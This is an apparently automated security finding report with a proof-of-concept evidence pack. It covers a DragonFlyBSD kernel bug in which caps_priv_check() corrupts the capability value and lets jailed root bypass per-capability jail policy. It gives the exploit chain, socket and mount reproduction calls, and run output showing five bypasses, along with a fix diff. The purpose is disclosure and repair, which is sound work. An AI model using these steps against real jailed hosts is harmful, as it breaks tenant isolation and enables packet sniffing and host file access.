caps_priv_check corrupts cap argument before prison_priv_check: bypasses per-cap jail policy (raw sockets + mounts in jail)
| Field | Value |
|---|---|
| ID | DF-0165 |
| Status | new |
| Severity | High |
| CVSS 3.1 | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N |
| CWE | CWE-863 Incorrect Authorization |
| File | sys/kern/kern_caps.c |
| Lines | 333-340 |
| Area | kern |
| Confidence | certain |
| Discovered | 2026-06-30 |
| Reported | pending |
Summary
caps_priv_check() mutates its cap argument in the group-handling
block (:335), reducing it from the specific capability (e.g.
SYSCAP_NONET_RAW = 0x61) to the group master number (e.g. 6 =
SYSCAP_NONET). The mutated value is then passed to
prison_priv_check() (:340), which matches the group-master case
(case SYSCAP_NONET: return 0 = "allowed in jail") instead of the
specific-capability case (case SYSCAP_NONET_RAW: which checks
PRISON_CAP_NET_RAW_SOCKETS). This allows jailed root to create raw
sockets and mount restricted filesystem types even when the
corresponding jail policy toggle is disabled.
Root cause
In caps_priv_check() (sys/kern/kern_caps.c:333-340):
res = caps_check_cred(cred, cap);
if (cap & __SYSCAP_GROUP_MASK) {
cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; // :335
res |= caps_check_cred(cred, cap);
}
if (res & __SYSCAP_SELF)
return EPERM;
return (prison_priv_check(cred, cap)); // :340 โ cap is now WRONG
The capability encoding:
- __SYSCAP_GROUP_MASK = 0x000000F0 (bits 4-7)
- __SYSCAP_GROUP_SHIFT = 4
- SYSCAP_NONET = 6 (group-0 master)
- SYSCAP_NONET_RAW = 0x61 (group 6 | index 1)
When cap = SYSCAP_NONET_RAW (0x61):
- Line 335: cap = (0x61 & 0xF0) >> 4 = 0x60 >> 4 = 6
- 6 is SYSCAP_NONET โ the group master
In prison_priv_check() (sys/kern/kern_jail.c):
case SYSCAP_NONET: /* line 865 */
return (0); /* allowed in jail */
...
case SYSCAP_NONET_RAW: /* line 919 โ NEVER REACHED */
if (pr->pr_caps & PRISON_CAP_NET_RAW_SOCKETS)
return (0);
return (EPERM);
The case SYSCAP_NONET_RAW at :919 is dead code on the
caps_priv_check() path โ prison_priv_check always receives 6
(SYSCAP_NONET), not 0x61 (SYSCAP_NONET_RAW).
The same bypass applies to all NOMOUNT_* capabilities:
SYSCAP_NOMOUNT_NULLFS/DEVFS/TMPFS/PROCFS/FUSE are reduced to
SYSCAP_NOMOUNT (10) which hits case SYSCAP_NOMOUNT: return 0
(:872).
Threat model & preconditions
- Attacker position: Jailed root (uid 0 inside a jail).
- Impact:
- Create raw IP/IPv6 sockets despite
jail.net_raw_sockets=0โ packet sniffing, spoofing, attacks on other tenants. - Mount nullfs/devfs/tmpfs/procfs/fuse despite corresponding jail toggle being off โ host filesystem access, device node creation.
- Required config: Default kernel with jail support. The jail must have the relevant capability toggles disabled (the default).
- Reachability:
socket(AF_INET, SOCK_RAW, ...)from jailed root;mount -t nullfs ...from jailed root.
Proof of concept
PoC source: findings/poc/DF-0165/
Build & run
# In a jail with net_raw_sockets=0: # From jailed root: socket(AF_INET, SOCK_RAW, IPPROTO_RAW); # Returns 0 (success) instead of EPERM # In a jail with vfs_mount_nullfs=0: # From jailed root: mount -t nullfs /host/path /inside/jail # Succeeds instead of EPERM
Expected output
# Raw socket: succeeds (should fail with EPERM) # Mount: succeeds (should fail with EPERM)
Impact
Jail containment is broken for all capabilities whose jail policy is conditional/EPERM while their group master policy is "allowed". This affects every DragonFlyBSD deployment that uses jails for tenant isolation. Raw socket access allows packet injection/sniffing; mount access allows host filesystem traversal. This is a cross-tenant attack vector in multi-tenant hosting environments.
Recommended fix
Do not mutate the cap variable used for the jail lookup. Use a
separate local for the group-master bitmask test:
--- a/sys/kern/kern_caps.c
+++ b/sys/kern/kern_caps.c
@@ -331,9 +331,10 @@
res = caps_check_cred(cred, cap);
if (cap & __SYSCAP_GROUP_MASK) {
- cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
- res |= caps_check_cred(cred, cap);
+ int gcap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
+ res |= caps_check_cred(cred, gcap);
}
if (res & __SYSCAP_SELF)
return EPERM;
- return (prison_priv_check(cred, cap));
+ return (prison_priv_check(cred, cap)); /* pass ORIGINAL cap */
}
References
sys/kern/kern_jail.c:865-866โcase SYSCAP_NONET: return 0sys/kern/kern_jail.c:919-927โcase SYSCAP_NONET_RAW(dead code on caps_priv_check path)sys/kern/kern_jail.c:951-975โcase SYSCAP_NOMOUNT_*(dead code)sys/netinet/raw_ip.c:473โ caller passes SYSCAP_NONET_RAWsys/kern/vfs_syscalls.c:152-157โ caller passes SYSCAP_NOMOUNT_*
Timeline
- 2026-06-30 Discovered during automated audit.
PoC verification
Evidence pack
findings/poc/DF-0165 ยท 11 files| File | Type | Description | Size | |
|---|---|---|---|---|
| bypass.c | trigger-source | self-contained jail-create + gated-action driver; proves cap-corruption bypass | 5.2 KB | view raw |
| build.sh | build-script | cc -O2 -Wall -o bypass bypass.c | 150 B | view raw |
| run.sh | run-script | echoes jail default-policy sysctls then runs ./bypass | 757 B | view raw |
| build.log | build-log | final successful build, full output | 69 B | view raw |
| run.log | run-log | decisive run: 5 bypasses observed | 1.0 KB | view raw |
| run.2.log | run-log | repeat run for reproducibility | 733 B | view raw |
| run.3.log | run-log | third repeat run for reproducibility | 733 B | view raw |
| env.txt | environment | uname, cc version, jail default policy sysctls | 703 B | view raw |
| VERDICT.md | verdict | full narrative + line-by-line kernel trace + recommended fix | 7.2 KB | โ raw |
| README.md | readme | what this pack is and how to reproduce | 2.5 KB | โ raw |
| manifest.json | manifest | this file | 2.7 KB | view raw |
DF-0165 โ PoC evidence pack
What this is
Demonstrates that caps_priv_check() in sys/kern/kern_caps.c:333-340
mutates its cap argument from the specific capability (e.g.
SYSCAP_NONET_RAW = 0x61) to its group-master number (SYSCAP_NONET = 6)
before forwarding it to prison_priv_check(), which has
case SYSCAP_NONET: return 0 and case SYSCAP_NOMOUNT: return 0. The
per-capability switch arms that actually consult the jail policy flags
are dead code on this path. Result: a jailed root can do raw socket
creation and tmpfs/nullfs/devfs/procfs mounts that the jail policy
explicitly forbids.
See VERDICT.md for the full mechanism walkthrough and the line-by-line
trace.
Reproduce
./build.sh # cc -O2 -Wall -o bypass bypass.c
./run.sh # creates jail with default policy, tries gated actions
Must be run as root on the guest (the test creates+enters a jail).
run.sh first echoes the jail default-policy sysctls (proving they are
all 0 / restrictive), then runs ./bypass.
Expected output
jail() ok: jid=N (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
(jail default policy: allow_raw_sockets=0,
vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
socket(AF_INET, SOCK_RAW, IPPROTO_RAW) [SYSCAP_NONET_RAW]
-> OK fd=3 *** BYPASS ***
mount("tmpfs", ...) [SYSCAP_NOMOUNT_TMPFS] -> OK *** BYPASS ***
mount("null", ...) [SYSCAP_NOMOUNT_NULLFS] -> OK *** BYPASS ***
mount("devfs", ...) [SYSCAP_NOMOUNT_DEVFS] -> OK *** BYPASS ***
mount("procfs", ...) [SYSCAP_NOMOUNT_PROCFS] -> OK *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===
On a fixed kernel every action returns EPERM instead of OK.
Why the PoC was rewritten
The original (per-finding) PoC snippet was a 4-line shell pseudocode
("from jailed root, run mount/socket"). I implemented it as a real C
program (bypass.c) that:
- creates the jail itself (no separate
jail(8)setup needed), - attaches via
jail(2)(which auto-attaches perkern_jail_attachatsys/kern/kern_jail.c:227), - drives each gated action and reports
OK / EPERMper action.
Notable gotcha worth recording: the kernel's nullfs fstype is "null",
not "nullfs" โ get_fscap()'s strncmp("null", fsname, 5) only matches
the bare name. Using mount("nullfs", ...) makes the syscall hit a
different (default) cap and fail for an unrelated reason; using
mount("null", ...) exercises the actual SYSCAP_NOMOUNT_NULLFS path
and demonstrates the bypass cleanly.
DF-0165 โ caps_priv_check cap-corruption -> jail policy bypass
Verdict: REPRODUCED (5 distinct cap-gated actions bypass jail policy)
Inside a jail created with the default restrictive policy (allow_raw_sockets=0,
vfs_mount_{nullfs,tmpfs,devfs,procfs}=0), a jailed root (uid 0) successfully:
- opens a raw IPv4 socket (
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) โSYSCAP_NONET_RAW - mounts tmpfs โ
SYSCAP_NOMOUNT_TMPFS - mounts nullfs โ
SYSCAP_NOMOUNT_NULLFS(using kernel fstype "null") - mounts devfs โ
SYSCAP_NOMOUNT_DEVFS - mounts procfs โ
SYSCAP_NOMOUNT_PROCFS
On a fixed kernel, each of these returns EPERM because the per-capability
jail policy flag is clear. On this build they all succeed, proving the
bypass.
Mechanism (root cause confirmed line-by-line)
In sys/kern/kern_caps.c:333-340:
res = caps_check_cred(cred, cap); /* :333 */
if (cap & __SYSCAP_GROUP_MASK) { /* :334 */
cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; /* :335 -- MUTATES cap */
res |= caps_check_cred(cred, cap); /* :336 */
}
if (res & __SYSCAP_SELF)
return EPERM;
return (prison_priv_check(cred, cap)); /* :340 -- passes MUTATED cap */
For a per-capability value like SYSCAP_NONET_RAW = __SYSCAP_GROUP_6 | 1 = 0x61:
:334cap & __SYSCAP_GROUP_MASK=0x61 & 0xF0=0x60(truthy):335cap = (0x61 & 0xF0) >> 4=0x6(=SYSCAP_NONET, the group master):340prison_priv_check(cred, 0x6)โ the specific cap (0x61) is never sent
In prison_priv_check (sys/kern/kern_jail.c:854-978):
case SYSCAP_NONET: /* :865-866 group master: ALLOWED */
return 0;
...
case SYSCAP_NOMOUNT: /* :872,878 group master: ALLOWED */
return 0;
...
case SYSCAP_NONET_RAW: /* :919-927 per-capability check -- DEAD on this path */
if (PRISON_CAP_ISSET(pr->pr_caps, PRISON_CAP_NET_RAW_SOCKETS)) return 0;
return EPERM;
The case SYSCAP_NONET_RAW and the case SYSCAP_NOMOUNT_* branches are
dead code on the caps_priv_check() path โ prison_priv_check always
receives the group-master number and matches the unconditional return 0
case, so the per-capability PRISON_CAP_* flag is never consulted.
Encoding reference (sys/sys/caps.h)
__SYSCAP_GROUP_MASK = 0x000000F0 (bits 4..7) __SYSCAP_GROUP_SHIFT = 4 __SYSCAP_XFLAGS = 0x7FFF0000 (e.g. __SYSCAP_NULLCRED, NOROOTTEST) Group-0 master caps (these match the "ALLOWED in jail" cases): SYSCAP_NONET = 0x06 -> prison_priv_check returns 0 (allowed) SYSCAP_NOMOUNT = 0x0A -> prison_priv_check returns 0 (allowed) Per-capability values (their *specific* switch arms are the real policy): SYSCAP_NONET_RAW = 0x61 -> corrupted to 0x6 -> matches SYSCAP_NONET SYSCAP_NOMOUNT_NULLFS = 0xA0 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT SYSCAP_NOMOUNT_DEVFS = 0xA1 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT SYSCAP_NOMOUNT_TMPFS = 0xA2 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT SYSCAP_NOMOUNT_FUSE = 0xA4 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT SYSCAP_NOMOUNT_PROCFS = 0xA5 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
Caller chain (where the bypass matters)
-
sys/netinet/raw_ip.c:473โrip_attachcallscaps_priv_check(ai->p_ucred, SYSCAP_NONET_RAW | __SYSCAP_NULLCRED). Withcap = 0x00020061, the corruption still reduces it to6:0x00020061 & 0xF0 = 0x60,>> 4 = 6. -
sys/kern/vfs_syscalls.c:152-157โsys_mountcallscaps_priv_check_td(td, priv)wherepriv = get_fscap(fstypename).get_fscap()returns the specificSYSCAP_NOMOUNT_*value, which is corrupted toSYSCAP_NOMOUNT.
Threat model
- Attacker position: jailed root (uid 0 inside a jail).
- What the attacker gets:
- Raw IP sockets despite
jail.defaults.allow_raw_sockets=0. Enables packet sniffing, IP-spoofed packet injection, ICMP attacks against other tenants / host. - Mount nullfs / tmpfs / devfs / procfs inside the jail despite
jail.defaults.vfs_mount_*=0. Mounting devfs exposes device nodes; mounting nullfs over a host-visible path bypasses filesystem-level isolation; mounting procfs exposes host process metadata. - Preconditions: default DragonFlyBSD jail (no special config required).
- Reachability: trivial โ
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)andmount("tmpfs", target, 0, NULL)from jailed root.
Demonstration
---- jail default policy (should all be 0): ----
jail.defaults.allow_raw_sockets: 0
jail.defaults.vfs_mount_nullfs: 0
jail.defaults.vfs_mount_tmpfs: 0
jail.defaults.vfs_mount_devfs: 0
jail.defaults.vfs_mount_procfs: 0
---- running bypass as root (will create + enter jail): ----
jail() ok: jid=11 (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
(jail default policy: allow_raw_sockets=0,
vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
socket(AF_INET, SOCK_RAW, IPPROTO_RAW) [SYSCAP_NONET_RAW]
-> OK fd=3 *** BYPASS ***
mount("tmpfs", /tmp/df0165-mnt-tmpfs) [SYSCAP_NOMOUNT_TMPFS]
-> OK *** BYPASS ***
mount("null", /tmp/df0165-mnt-nullfs) [SYSCAP_NOMOUNT_NULLFS]
-> OK *** BYPASS ***
mount("devfs", /tmp/df0165-mnt-devfs) [SYSCAP_NOMOUNT_DEVFS]
-> OK *** BYPASS ***
mount("procfs", /tmp/df0165-mnt-procfs) [SYSCAP_NOMOUNT_PROCFS]
-> OK *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===
Reproduced 3 times in a row (see run.log, run.2.log, run.3.log);
every run yields the same 5 bypasses. The only inter-run difference is
the jid= value, which is just an incrementing jail counter.
Notes / minor adjacent issues (not part of DF-0165)
-
get_fscap()insys/kern/vfs_syscalls.c:5386matchesstrncmp("null", fsname, 5), which does NOT match the user-visible fstype"nullfs". The kernel fstype for nullfs is"null"(its vfsconfvfc_name). Anyone callingmount("nullfs", ...)falls through to theSYSCAP_RESTRICTEDROOTdefault โ a separate latent surprise that the PoC works around by using"null". -
The same corruption affects
SYSCAP_NONET_BT_RAW,SYSCAP_NONET_ROUTE,SYSCAP_NONET_IFCONFIG, etc., but those callers either route through a different cap or the action is independently gated. The five actions demonstrated here are the directly observable wins.
Recommended fix (matches the finding's diff)
Don't mutate the cap variable used for the jail lookup. Use a separate
local for the group-master test:
--- a/sys/kern/kern_caps.c
+++ b/sys/kern/kern_caps.c
@@ -331,9 +331,10 @@
res = caps_check_cred(cred, cap);
if (cap & __SYSCAP_GROUP_MASK) {
- cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
- res |= caps_check_cred(cred, cap);
+ int gcap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
+ res |= caps_check_cred(cred, gcap);
}
if (res & __SYSCAP_SELF)
return EPERM;
- return (prison_priv_check(cred, cap));
+ return (prison_priv_check(cred, cap)); /* ORIGINAL specific cap */
}
After the fix, the PoC should output EPERM for every action (policy honored).
Confirmed kernel references
- sys/kern/kern_caps.c:333
- sys/kern/kern_caps.c:335
- sys/kern/kern_caps.c:340
- sys/kern/kern_jail.c:847
- sys/kern/kern_jail.c:865
- sys/kern/kern_jail.c:866
- sys/kern/kern_jail.c:872
- sys/kern/kern_jail.c:878
- sys/kern/kern_jail.c:919
- sys/kern/kern_jail.c:951
- sys/kern/kern_jail.c:956
- sys/kern/kern_jail.c:961
- sys/kern/kern_jail.c:966
- sys/netinet/raw_ip.c:473
- sys/kern/vfs_syscalls.c:152
- sys/kern/vfs_syscalls.c:157
- sys/sys/caps.h:116
- sys/sys/caps.h:117
- sys/sys/caps.h:137
- sys/sys/caps.h:141
- sys/sys/caps.h:196
- sys/sys/caps.h:223
Detail
Exploit chain
root on host -> jail(path=/, default policy all 0) auto-attaches via kern_jail_attach -> inside jail, attempt cap-gated action -> caps_priv_check() corrupts cap from specific value (0x61/0xA0/0xA1/0xA2/0xA5) to group-master (6 or 10) -> prison_priv_check() returns 0 unconditionally -> action succeeds despite jail policy=0. Demoed wins: raw IPv4 socket (packet sniff/inject), tmpfs/nullfs/devfs/procfs mounts inside jail (devfs exposes device nodes, nullfs exposes host paths, procfs exposes host process metadata). No heap grooming needed - this is a pure logic/authz bypass.
Evidence (decisive lines)
jail() ok: jid=11 (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
(jail default policy: allow_raw_sockets=0,
vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
socket(AF_INET, SOCK_RAW, IPPROTO_RAW) [SYSCAP_NONET_RAW]
-> OK fd=3 *** BYPASS ***
mount("tmpfs", /tmp/df0165-mnt-tmpfs) [SYSCAP_NOMOUNT_TMPFS] -> OK *** BYPASS ***
mount("null", /tmp/df0165-mnt-nullfs) [SYSCAP_NOMOUNT_NULLFS] -> OK *** BYPASS ***
mount("devfs", /tmp/df0165-mnt-devfs) [SYSCAP_NOMOUNT_DEVFS] -> OK *** BYPASS ***
mount("procfs", /tmp/df00165-mnt-procfs) [SYSCAP_NOMOUNT_PROCFS] -> OK *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===
jail.defaults.allow_raw_sockets/vfs_mount_{nullfs,tmpfs,devfs,procfs} all = 0
PoC changes
Rewrote the per-finding PoC (a 4-line shell pseudocode snippet) as a real C program 'bypass.c' that creates a jail via jail(2), auto-attaches, and attempts all five cap-gated actions reporting OK/EPERM each. Discovered and worked around a separate latent bug in get_fscap() (sys/kern/vfs_syscalls.c:5386): its strncmp("null",fsname,5) only matches the bare fstype "null", not "nullfs" - using "null" exercises the actual SYSCAP_NOMOUNT_NULLFS path and proves the bypass. Added run.sh that first echoes the restrictive jail default-policy sysctls as evidence the policy is off.
Verified recommended fix
In sys/kern/kern_caps.c caps_priv_check(), stop reusing cap for the group-master test -- use a separate local gcap so the ORIGINAL specific capability reaches prison_priv_check(); matches finding proposal. Full git-apply-able diff in findings/poc/DF-0165/fix.diff.
Verdict
REPRODUCED. caps_priv_check() at sys/kern/kern_caps.c:335 mutates the cap argument (e.g. SYSCAP_NONET_RAW=0x61) to its group-master number (6=SYSCAP_NONET) before forwarding it to prison_priv_check() at :340; in prison_priv_check() the corrupted value matches case SYSCAP_NONET: return 0 (kern_jail.c:865-866) / case SYSCAP_NOMOUNT: return 0 (kern_jail.c:872,878), so the per-capability switch arms that actually consult PRISON_CAP_* (kern_jail.c:919-975) are dead code on this path. I verified this line-by-line in sys/, then built a self-contained PoC (bypass.c) that creates a jail via jail(2) with the default restrictive policy and attempts every gated action: socket(AF_INET,SOCK_RAW,IPPROTO_RAW), mount(tmpfs/null/devfs/procfs) all succeed (output ends with '5 cap-gated action(s) bypassed jail policy'); on a fixed kernel each would return EPERM. Reproduced 3x with identical results.